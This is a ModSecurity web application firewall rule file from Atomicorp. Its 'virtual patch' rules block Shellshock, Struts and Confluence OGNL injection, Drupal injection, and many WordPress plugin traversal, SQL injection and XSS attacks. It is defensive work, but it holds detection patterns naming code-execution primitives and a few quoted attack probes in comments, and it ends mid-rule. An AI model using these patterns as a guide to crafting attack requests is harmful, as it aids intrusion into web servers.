SecDefaultAction "log,deny,auditlog,phase:2,status:403" SecRule REQUEST_FILENAME "/viewtopic\.php" "phase:2,id:95347,t:none,t:lowercase,pass,nolog,noauditlog,skip:1" SecAction "phase:2,id:95348,t:none,pass,nolog,skipAfter:END_RULES_95348" SecRule REQUEST_URI "(?:highlight.*(?:\'\.|\x2527|\x27)|include\.*get\[.*\]\|=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|(?:printf|system)\()" "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:390761,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RFI Injection Exploit',logdata:'%{TX.0}'" SecMarker END_RULES_95348 SecRule REQUEST_FILENAME "/administrator/index\.php" "phase:2,id:95349,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390605,ctl:ruleRemovebyID=390603,ctl:ruleRemovebyID=390449" SecRule REQUEST_FILENAME "/administrator/index2\.php" "phase:2,id:95350,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390605,ctl:ruleRemovebyID=390603" SecRule REQUEST_FILENAME "/magento-1\.4/" "phase:2,id:95351,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390630" SecRule REQUEST_FILENAME "/gestor/download\.php" "phase:2,id:95352,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=314001" SecRule REQUEST_FILENAME "/admindau/" "phase:2,id:95353,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390630" SecRule REQUEST_FILENAME "/uos\.cgi" "phase:2,id:95354,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390761" SecRule REQUEST_FILENAME "/clientes/index\.php" "phase:2,id:95355,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390552" SecRule REQUEST_FILENAME "/clientshosting\.php" "phase:2,id:95356,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390552" SecRule REQUEST_FILENAME "/import\.php" "phase:2,id:95357,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393449" SecRule REQUEST_FILENAME "/members/login\.php" "phase:2,id:95358,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390552" SecRule REQUEST_FILENAME "/forum/viewtopic\.php" "phase:2,id:95359,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390439" SecRule REQUEST_FILENAME "/wp-admin/admin-ajax\.php" "phase:2,id:95360,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=303669" SecRule REQUEST_FILENAME "/previewemail\.php" "phase:2,id:95361,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=381239" SecRule REQUEST_FILENAME "/wp-admin/post\.php" "phase:2,id:95362,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=331702" SecRule REQUEST_FILENAME "/wp-admin/admin-ajax\.php" "phase:2,id:95363,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=331702" SecRule REQUEST_FILENAME "/admin/moduleinterface\.php" "phase:2,id:95364,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=331702" SecRule REQUEST_FILENAME "/sendy/includes/list/edit\.php" "phase:2,id:95365,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=331702" # http://www.atomicorp.com/ # Atomicorp (Gotroot.com) ModSecurity rules # Virtual Just In Time Patches for Vulnerable Applications Rules # for modsec 2.9.3 and up # # Copyright 2005-2024 by Atomicorp, Inc., all rights reserved. # Redistribution is strictly prohibited in any form, including whole or in part. # Distribution of this work or derivative of this work in any form is # prohibited unless prior written permission is obtained from the # copyright holder. # # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS and CONTRIBUTORS AS IS # and ANY EXPRESS or IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY and FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER or CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, or # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS or SERVICES; LOSS OF USE, DATA, or PROFITS; or BUSINESS # INTERRUPTION) HOWEVER CAUSED and ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, or TORT (INCLUDING NEGLIGENCE or OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF # THE POSSIBILITY OF SUCH DAMAGE. # #---ASL-CONFIG-FILE--- # Do not edit this file! # This file is generated and changes will be overwritten. # # If you need to make changes to the rules, please follow the procedure here: # http://www.atomicorp.com/wiki/index.php/Mod_security #-------------------------------- # notes #-------------------------------- #-------------------------------- #start rules #-------------------------------- # Phase 2 rules # #Bash attacks SecRule REQUEST_HEADERS|FILES_NAMES|ARGS|ARGS_NAMES|!ARGS:/msg/|!ARGS:/message/|!ARGS:/txt/|!ARGS:/text/ "^ ?\( ?\) ?{" "phase:1,deny,id:330701,rev:3,severity:1,t:none,t:urlDecodeUni,t:compressWhiteSpace,status:403,log,auditlog,msg:'Atomicorp.com WAF Rules: CVE-2014-6271 Bash Attack'" SecRule REQUEST_LINE "^ ?\( ?\) ?{" "phase:1,deny,id:330702,rev:3,severity:1,t:none,t:compressWhiteSpace,status:403,log,auditlog,msg:'Atomicorp.com WAF Rules: CVE-2014-6271 Bash Attack'" #moved from embargoed rules Nov15 2024 SecRule REQUEST_URI "/wp-json/reallysimplessl/v1/two_fa/skip_onboarding" "id:331704,phase:2,deny,status:403,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules: Really Simple SSL authentication bypass attack',severity:1,rev:12,log,auditlog,chain" SecRule &ARGS:user_id "@ge 1" "t:none,chain" SecRule &ARGS:login_nonce "@ge 1" "t:none,chain" SecRule &ARGS:redirect_to "@ge 1" "t:none" #Moved from embargoed rules Jan 3 2022 SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|!ARGS:email_text|!ARGS:/message/|!ARGS:FormLayout|!ARGS:/svg/|!ARGS:/template/|!ARGS:/translate/|!ARGS:mepr-emails|!ARGS:wcf_email_body|!ARGS:/content/ "@rx [\"'`][\[\{].*[\]\}][\"'`].*(::.*jsonb?)?.*(?:(?:@|->?)>|<@|\?[&\|]?|#>>?|[<>]|<-)|(?:(?:@|->?)>|<@|\?[&\|]?|#>>?|[<>]|<-)[\"'`][\[\{].*[\]\}][\"'`]|json_extract.*\(.*\)" "id:331702,phase:2,deny,status:403,t:none,t:urlDecodeUni,t:lowercase,t:removeWhitespace,msg:'Atomicorp.com WAF Rules: Possible JSON-Based SQL Injection',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'SQLi',severity:1,rev:12,log,auditlog" #/editBlackAndWhiteList SecRule REQUEST_URI "editBlackAndWhiteList" "id:394669,phase:2,t:none,deny,auditlog,log,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API RCE attempt blocked',rev:1,severity:2" #Known malware sign1 SecRule ARGS_NAMES "^(?:e44e|wowex)$" "phase:2,deny,status:403,id:334071,rev:2,severity:1,t:none,t:compressWhiteSpace,t:lowercase,status:403,log,auditlog,msg:'Atomicorp.com WAF Rules: Known PHP code injection Attack'" #Known malware sign1 #SecRule ARGS_NAMES "miglaa_update_(?:me|arr|barinfo)" #SecRule ARGS_NAMES "miglaa_(?:update|stripe|sync)_" SecRule ARGS_NAMES|ARGS:action "miglaa?_" "phase:2,deny,status:403,id:334072,rev:5,severity:1,t:none,t:urlDecodeUni,t:lowercase,status:403,log,auditlog,msg:'Atomicorp.com WAF Rules: CVE-2019-6703 Attack blocked'" #vulnerability scanner SecRule ARGS "\'\|\|\'" "phase:2,deny,status:403,id:334073,rev:1,severity:1,t:none,t:urlDecodeUni,t:removewhitespace,status:403,log,auditlog,msg:'Atomicorp.com WAF Rules: Injection Attack blocked'" #CryptoPHP SecRule REQUEST_METHOD "@streq POST" "chain,id:394667,phase:2,t:none,deny,auditlog,log,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible CryptoPHP backdoor attempt',rev:1,severity:2" SecRule REQUEST_HEADERS:Content-Disposition "form-data; name ?= ?\"?serverkey" "t:none,t:lowercase,t:compressWhiteSpace,chain" SecRule REQUEST_HEADERS:Content-Disposition "form-data; name ?= ?\"?data" "t:none,t:lowercase,t:compressWhiteSpace,chain" SecRule REQUEST_HEADERS:Content-Disposition "form-data; name ?= ?\"?key" "t:none,t:lowercase,t:compressWhiteSpace,chain" SecRule &REQUEST_HEADERS:User-Agent "@eq 0" "t:none" SecRule REQUEST_METHOD "@streq POST" "chain,id:394666,phase:2,t:none,deny,auditlog,log,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible CryptoPHP backdoor attempt',rev:1,severity:2" SecRule &REQUEST_HEADERS:serverKey "@eq 1" "t:none,chain" SecRule &REQUEST_HEADERS:data "@eq 1" "t:none,chain" SecRule &REQUEST_HEADERS:key "@eq 1" "t:none,chain" SecRule &REQUEST_HEADERS:User-Agent "@eq 0" "t:none" SecRule REQUEST_URI "@pm .bat .cmd" "id:357876,phase:2,t:none,pass,nolog,noauditlog,skip:1" SecAction "phase:2,id:359931,t:none,pass,nolog,noauditlog,skipAfter:END_RFD" #RFD attacks SecRule REQUEST_URI "@rx (?i:^[^?]*\.(?:bat|cmd)(?: |$))" "phase:2,id:312863,t:none,t:urlDecodeUni,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Potential Reflected File Download (RFD) Attack.'" SecMarker END_RFD #Struts RCE attack SecRule REQUEST_URI|ARGS|XML:/*|REQUEST_HEADERS:Content-Type "@pm inputstream ognl sun.misc opensymphony beanmap utility.execute allowstaticmethodaccess memberaccess cmd getparameter runtime unmarshaller java base64 org.apache.tomcat" "phase:2,id:368829,t:none,t:urlDecodeUni,multimatch,pass,nolog,noauditlog,skip:1" SecAction "phase:2,id:361112,t:none,pass,nolog,noauditlog,skipAfter:END_STRUTS" #CVE-2020-17530 SecRule REQUEST_URI "\.action" "chain,phase:2,status:403,deny,log,auditlog,id:339207,rev:1,severity:2,t:none,t:urlDecodeUni,t:lowercase,multimatch,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Struts CVE-2020-17530 RCE attack blocked'" SecRule ARGS|XML:/* "(?:collections\.beanmap|template\.utility\.execute)" "t:none,t:urlDecodeUni,t:lowercase,multimatch" #java.lang.Runtime@getRuntime().exec SecRule REQUEST_URI "\.action" "chain,phase:2,status:403,deny,log,auditlog,id:337207,rev:4,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Java RCE attack blocked'" SecRule ARGS|XML:/* "(?:java\.lang\.runtime@getruntime\(\)\.exec\(|com\.opensymphony\.xwork)" "t:none,t:urlDecodeUni,t:lowercase" SecRule ARGS|XML:/* "(?:sun\.misc\.base64decoder|unmarshaller\.base64data|java.lang.runtime.{1,200}exec\()" "chain,phase:2,status:403,deny,log,auditlog,id:337206,rev:8,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Struts RCE attack blocked'" SecRule ARGS|XML:/* "javax?\.(?:io\.fileoutputstream|imageio\.spi\.|lang\.processbuilder)" "t:none,t:lowercase,t:urlDecodeUni" SecRule ARGS|XML:/* "\${\(\#_memberaccess\[\"allowstaticmethodaccess" "phase:2,status:403,deny,log,auditlog,id:337208,rev:6,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Struts RCE attack blocked'" SecRule ARGS|XML:/* "(?:java\.lang\.runtime.{1,200}exec\(|request\.getparameter\(\"cmd\")" "phase:2,status:403,deny,log,auditlog,id:337210,rev:8,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Java RCE attack blocked'" SecRule ARGS|XML:/*|REQUEST_HEADERS:Content-Type "\)\.\(#cmd=\'" "phase:2,status:403,deny,log,auditlog,id:337218,rev:1,severity:2,t:none,t:urlDecodeUni,t:lowercase,t:removewhitespace,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Struts RCE attack blocked'" SecRule REQUEST_URI|ARGS|XML:/* "java\.(?:lang|util)" "chain,phase:2,status:403,deny,log,auditlog,id:337211,rev:4,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134) blocked'" SecRule REQUEST_URI|ARGS|XML:/* "(?:getinputstream|getruntime\(\)\.exec)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase" #Generic java code injection SecRule REQUEST_URI|ARGS|XML:/* "javax?\.(?:lang|util|script)" "chain,phase:2,status:403,deny,log,auditlog,id:337209,rev:5,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Java remote code injection blocked'" SecRule REQUEST_URI|ARGS|XML:/* "(?:p\.command\((\'cmd|[cbd]?a?sh)|base64\.decoder\(\)\.decode|getinputstream|getruntime\(\)\.exec\(|processbuilder\(\)\.command|nio\.file\.files)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,t:removewhitespace" SecMarker END_STRUTS #RCE Joomla rule not needed #Only added to give more information to the threat intelligence system that this was specifically a Joomla RCE attack #Rule 347195 already protected against this vulnerability SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:X_FORWARDED_FOR|ARGS:filter-search "(?:drivermysql|jfactory|databasedriver|(}_|^\:))" "phase:2,status:403,deny,log,auditlog,id:337106,rev:2,severity:2,t:none,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla RCE attack blocked'" SecRule REQUEST_HEADERS:Referer "^{_.*(?:databasedriver|drivermysql|jfactory)" "phase:2,status:403,deny,log,auditlog,id:337107,rev:2,severity:2,t:none,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla RCE attack blocked'" #Moved to JITP rules from generic rules to trigger after 337106 so the TI can see specific cases of joomla only RCE attacks SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:X_FORWARDED_FOR "@pm php chr fopen fwrite globals system passthru serialize include php_uname popen proc_open mysql_query exec eval proc_nice proc_terminate proc_get_status proc_close pfsockopen leak apache_child_terminate posix_kill posix_mkfifo posix_setpgid posix_setsid posix_setuid phpinfo preg_ decode_base64 base64_decode base64_url_decode rot13 SecRule REQUEST_URI "/manager/\?a=system" "phase:2,t:none,t:urlDecodeUni,t:lowercase,log,deny,status:403,auditlog,id:336478,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ModX Revolution 2.3.5-pl Cross Site Scripting attack',chain" SecRule ARGS:file "(?:script|\} ?\) ?\;)" "t:none,t:urlDecodeUni,t:lowercase" #?gf_page=upload SecRule REQUEST_URI "\?gf_page=upload" "chain,capture,phase:2,deny,log,auditlog,id:391742,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Gravity Forms 1.8.19 Shell Upload Attack'" SecRule ARGS:name "\.ph(?:p|t)" "t:none,t:urlDecodeUni,t:lowercase" SecRule REQUEST_URI "\?gf_page=upload" "chain,capture,phase:2,deny,log,auditlog,id:391743,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Gravity Forms 1.8.19 Shell Upload Attack'" SecRule ARGS:gform_unique_id "\.\./\.\." "t:none,t:urlDecodeUni,t:lowercase" #WP 4.7 exploit SecRule REQUEST_URI "/wp/v2/posts/" "chain,capture,phase:2,deny,log,auditlog,id:390751,rev:2,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress REST API remote code injection attack',logdata:'%{TX.0}'" SecRule ARGS:id "!(^[0-9]+$)" "t:none,t:urlDecodeUni" #WP 4.7 exploit SecRule REQUEST_URI "/wp/v2/posts/" "chain,capture,phase:2,deny,log,auditlog,id:390753,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress REST API remote code injection attack',logdata:'%{TX.0}'" SecRule ARGS:id "[a-z]" "t:none,t:urlDecodeUni,t:lowercase" #/wp-json/wp/v2/posts/2549 #SecRule REQUEST_URI "/wp/v2/posts/[0-9]+" "chain,capture,phase:2,deny,log,auditlog,id:390752,rev:3,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress REST API probe',logdata:'%{TX.0}'" #SecRule REQUEST_METHOD "GET" "t:none" #drupal JITPs #moved from encrypted embargoed rules SecRule REQUEST_FILENAME "(?:index\.php|\/$)" "chain,capture,phase:2,deny,log,auditlog,id:390755,rev:2,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drupal Code Injection attack blocked',logdata:'%{TX.0}'" SecRule REQUEST_METHOD "^(?:GET|POST|HEAD)$" "chain,t:none" SecRule ARGS_NAMES|REQUEST_COOKIES_NAMES "(?:^\#(?:submit|validate|p(?:re_render|ost_render|rocess)|element_validate|after_build|(?:value|access)_callback$)|\[(?:\'|\")?#(?:submit|validate|p(?:re_render|ost_render|rocess)|element_validate|after_build|value_callback))" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,t:removenulls,t:removeWhiteSpace" #moved from encrypted embargoed rules SecRule REQUEST_URI "/\?q=" "chain,capture,phase:2,deny,log,auditlog,id:390766,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drupal Code Injection attack blocked',logdata:'%{TX.0}'" SecRule REQUEST_METHOD "^(?:GET|POST|HEAD)$" "chain,t:none" SecRule ARGS|ARGS_NAMES "\[\%2523" "t:none,t:removeWhiteSpace" #moved from encrypted embargoed rules SecRule REQUEST_URI "/\?q=file/ajax/actions/cancel/#options" "chain,capture,phase:2,deny,log,auditlog,id:390767,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drupal Code Injection attack blocked',logdata:'%{TX.0}'" SecRule REQUEST_METHOD "^(?:GET|POST|HEAD)$" "t:none" #/?a=fetch&content=%3Cphp%3Edie(@md5(HelloThinkCMF))%3C/php%3E SecRule ARGS:a "^fetch$" "chain,capture,phase:2,deny,log,auditlog,id:390768,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Code Injection attack blocked',logdata:'%{TX.0}'" SecRule ARGS:content "php" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase" #PHP applications SecRule REQUEST_FILENAME "\.ph(?:p|tml|t)" "id:333865,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1" SecAction "phase:2,id:309000,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP" SecRule REQUEST_METHOD "!(POST|GET|HEAD)" "phase:2,id:309200,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP" SecRule ARGS:action "plugins/myeasybackup/meb_download\.php" "chain,phase:2,deny,log,auditlog,id:322211,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP myEasybackup directory recursion attack ',severity:2" SecRule ARGS:dwn_file "\.\./" "t:none,t:urlDecodeUni,t:normalizePath" SecRule REQUEST_URI "/util/php/eval-stdin\.php" "phase:2,deny,log,auditlog,id:393782,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PGP eval stdin attack blocked',severity:2" SecRule REQUEST_URI "connector\.minimal\.php" "phase:2,deny,log,auditlog,id:393781,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress File Manager Plugin attack blocked',severity:2" SecRule REQUEST_FILENAME "wp-json/wp_live_chat_support/v1/remote_upload" "chain,phase:2,id:322121,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP Live Chat File Upload attack',severity:2" SecRule &ARGS_POST:cid "@ge 1" "chain,t:none" SecRule FILES "\.(?:(?:p|s|x|d)?h(?:p[2-7s]?|(?:tmp?)?l?)|dll|exe|js|p(?:l|y)|rb|sh|cgi|com|bat|aspx?)" "t:none,t:urlDecodeUni,t:lowercase" #tccj-update=update #tccj-content javascript SecRule ARGS:tccj-update "update" "chain,phase:2,deny,log,auditlog,id:393780,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Possible TC custom javscript injection attack blocked',severity:2" SecRule ARGS:tccj-content "script" "t:none,t:urlDecodeUni,t:lowercase" SecRule REQUEST_URI "wp-admin/profile\.php" "chain,id:334616,phase:2,t:none,deny,auditlog,log,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Advanced Access Manager attack attempt',rev:1,severity:2" SecRule &ARGS:/aam_user_roles/ "@eq 1" "t:none" #WP User Avatar plugin privilege escalation attack attempt SecRule REQUEST_METHOD "POST" "chain,id:334617,phase:2,t:none,deny,auditlog,log,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP User Avatar plugin privilege escalation attack attempt',rev:1,severity:2" SecRule REQUEST_URI "/wp-admin/profile\.php" "t:none,t:urlDecodeUni,t:lowercase,chain" SecRule ARGS:action "update" "t:none,t:lowercase,chain" SecRule ARGS "administrator" "t:none,t:lowercase,chain" SecRule &ARGS:/^members_user_roles\[\]/ "@eq 0" "t:none,t:urlDecodeUni,t:lowercase,chain" SecRule &ARGS:houzez_role "@eq 0" "t:none,t:lowercase,chain" SecRule REQUEST_COOKIES_NAMES "!@contains wordpress_sec" "t:none" #/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php SecRule REQUEST_URI "jax_async?_link" "chain,phase:2,deny,log,auditlog,id:393750,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress ajax_asyn_link LFI attack blocked',severity:2" SecRule ARGS:url "(?:\.\.\/|^/(?:etc|root|var|opt)/)" "t:none,t:urlDecodeUni,t:cmdline" SecRule REQUEST_URI "wp-admin/tools\.php" "chain,phase:2,deny,log,auditlog,id:393758,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress backup manager LFI attack blocked',severity:2" SecRule ARGS:page "backup_manager" "t:none,t:urlDecodeUni,t:lowercase,chain" SecRule ARGS:download_backup_file "\.\./" "t:none,t:urlDecodeUni,t:cmdline" SecRule REQUEST_URI "wp-content/plugins/db-backup/download\.php" "chain,phase:2,deny,log,auditlog,id:393759,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress backup manager LFI attack blocked',severity:2" SecRule ARGS:file "(?:\.\.\/|^/(?:etc|root|var|opt)/)" "t:none,t:urlDecodeUni,t:cmdline" SecRule REQUEST_URI "ajax_shortcode_pattern\.php" "chain,phase:2,deny,log,auditlog,id:393771,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress shortcode LFI attack blocked',severity:2" SecRule ARGS:ajax_path "(?:\.\.\/|^/(?:etc|root|var|opt)/)" "t:none,t:urlDecodeUni,t:cmdline" SecRule REQUEST_URI "adaptive-images-script\.php" "chain,phase:2,deny,log,auditlog,id:393772,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress adaptive-images-script.php LFI attack blocked',severity:2" SecRule ARGS:ajax_path "(?:\.\.\/|^/(?:etc|root|var|opt)/)" "t:none,t:urlDecodeUni,t:cmdline" SecRule REQUEST_URI "/opac/search_rss\.php" "chain,phase:2,deny,log,auditlog,id:393760,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: OPAC RSS Search SQL injection attack blocked',severity:2" SecRule ARGS:location "(?:\bselect\b|\bchr\()" "t:none,t:urlDecodeUni,t:removecomments,t:removeWhiteSpace,t:lowercase" #/html2canvasproxy.php?url=http://google.com SecRule REQUEST_URI "html2canvasproxy\.php" "chain,phase:2,deny,log,auditlog,id:393749,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress html2canvas proxy SSRF attack blocked',severity:2" SecRule ARGS:url "^http" "t:none,t:urlDecodeUni,t:lowercase" #WP admin.php vulnerabilities SecRule REQUEST_FILENAME "wp-admin/admin\.php" "id:322199,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1" SecAction "phase:2,id:322198,t:none,pass,nolog,noauditlog,skipAfter:END_WP_PHP_ADMIN" SecRule ARGS:page "wpfm-admin" "chain,phase:2,id:322314,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP AccessPress Themes attack (CVE-2020-25378)',severity:2" SecRule ARGS:id "\"" "t:none,t:UrlDecodeUni" SecRule ARGS:page "recall-add" "chain,phase:2,id:322313,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP recall products plugin XSS attack (CVE-2020-25380)',severity:2" SecRule ARGS:/recall/ "<(?:javascript|script|about|applet|activex|chrome)" "t:none,t:UrlDecodeUni,t:removewhitespace,t:lowercase" SecRule ARGS:repeater "'" "chain,phase:2,id:322111,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Load More SQL injection attack',severity:2" SecRule ARGS:page "ajax-load-more-repeaters" "t:none,t:urlDecodeUni,t:lowercase" SecRule ARGS:page "mediafromftp-search-register" "chain,phase:2,id:322122,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP Medoa Recursion attack',severity:2" SecRule ARGS_POST:searchdir "\.\./\.\." "t:none,t:urlDecodeUni,t:normalizePath" SecMarker END_WP_PHP_ADMIN SecRule REQUEST_FILENAME "wp-login\.php" "id:314895,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1" SecAction "phase:2,id:314896,t:none,pass,nolog,noauditlog,skipAfter:END_WP_LOGIN" #Possible WP brute force login attempt SecRule REQUEST_METHOD "@streq POST" "chain,id:393666,phase:2,t:none,pass,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Wordpress brute force attempt, direct Login Missing Referer (not blocked)',rev:4,severity:4,tag:'no_ar'" SecRule REQUEST_FILENAME "/wp-login\.php" "chain,t:none,t:lowercase,t:urlDecodeUni" SecRule &REQUEST_HEADERS:Referer "@eq 0" "t:none,chain" SecRule RESPONSE_STATUS "200" SecRule ARGS:log "!@rx ^$" "chain,id:323667,phase:2,t:none,pass,auditlog,log,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP XSS in Loginizer attack (CVE-2018-11366)',severity:2" SecRule ARGS:pwd "!@rx ^$" "chain,t:none" SecRule ARGS "<(?:javascript|script|about|applet|activex|chrome)" "t:none,t:htmlEntityDecode,t:removewhitespace,t:lowercase" SecMarker END_WP_LOGIN #admin-ajax vulnerabilities SecRule REQUEST_FILENAME "admin-(?:ajax|post)\.php" "id:334895,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1" SecAction "phase:2,id:373421,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_ADMIN_AJAX" SecRule REQUEST_METHOD "POST" "id:356710,rev:1,phase:2,t:none,chain,status:403,deny,log,auditlog,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress PHP Anywhere < 3.0.0 - Remote Code Execution',severity:2" SecRule ARGS:action "parse-media-shortcode" "t:none,t:urlDecodeUni,t:lowercase,chain" SecRule ARGS:shortcode "\[php_everywhere\]" 